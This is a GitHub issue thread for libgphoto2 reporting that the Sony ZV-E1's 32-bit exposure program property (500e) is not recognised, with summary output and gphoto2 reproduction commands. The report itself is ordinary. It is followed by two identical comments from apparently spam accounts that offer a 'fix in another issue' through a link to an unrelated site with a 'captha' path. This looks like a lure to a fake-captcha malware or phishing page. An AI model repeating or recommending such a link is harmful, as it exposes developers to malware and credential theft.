gphoto/libgphoto2 #1096: Sony ZV-E1 Exposure Program Mode setting not detected

vimalb, 2025-03-03:
**Describe the bug**

`/main/capturesettings/expprogram` not listed in the output of `gphoto2 --list-config` on a Sony ZV-E1.
Instead the `500e` property is just listed as `/main/other/500e`

I suspect this is because on the ZV-E1, 500e is a u32 property - see below excerpt from `gphoto2 --summary`
```
Exposure Program Mode     (500e rw u32): Enumeration [294912,65538,131075,196612,1,7,360465,360469,360468,360466,360467,360471,491604,491600,491601,491602,491603,622685,622681,622682,622683,622684,819351,819347,819348,819349,819350] value: M (1
```
Full output of  `gphoto2 --summary` for the Sony ZV-E1 attached as [ZV-E1.summary.txt](https://github.com/user-attachments/files/19061246/ZV-E1.summary.txt)

By comparison on a Sony A6700, 500e is a u16 property and is recognized just fine.
Full output of  `gphoto2 --summary` for the Sony A6700 attached as [A6700.summary.txt](https://github.com/user-attachments/files/19061247/A6700.summary.txt)

Of note - it roughly appears that the bottom 16 bits of the enumerated 500e values on the ZV-E1 happen to correspond to the Sony modes documented in `exposure_program_modes` struct in `ptp2/config.c`. I didn't test them all exhaustively, but the first half-dozen or so all line up as expected. 

**Name the camera**

Sony ZV-E1 

```
Model                          Port                                            
----------------------------------------------------------
USB PTP Class Camera           usb:002,009 
```

```
Camera summary:
Manufacturer: Sony Corporation
Model: ZV-E1
  Version: 1.00
  Serial Number: 00000000000000003285421001360488
Vendor Extension ID: 0x11 (1.0)
Vendor Extension Description: Sony PTP Extensions
```

**libgphoto2 and gphoto2 version**

libgphoto2 and gphoto2 built off latest github master branch as of 2025-03-03

libgphoto2 - `master`@`017c24dc1f61e753a166ab081b9ed69cc60b140d`
gphoto2 - `master`@`dfd3d4328d31a28436746191c3d4fa6b258ab797`

**To Reproduce**

Build and install libgphoto2 and gphoto2 form latest github master branches

Then plug in Sony ZV-E1

`gphoto2 --get-config /main/capturesettings/expprogram` throws an error on the ZV-E1 but lists expected exposure program modes on a Sony A6700.

`gphoto2 --get-config 500e` works correctly using raw 32-bit value on the ZV-E1, eg:
`gphoto2 --set-config 500e=65538` sets exposure program mode to "P"
`gphoto2 --set-config 500e=131075` sets exposure program mode to "A"

I don't believe debug output is strictly necessary, but I can provide it on request for any of the commands above. 

Note that the Sony ZV-E1 is not listed as a "supported" camera, but all of the other basic settings on the ZV-E1 (and most other new Sony cameras) largely just work even without explicit support which is why I logged this specific behavior as a bug. Happy to make a new camera support request instead if appropriate.

DomesticFemBoy, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)

Domestos2281337, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)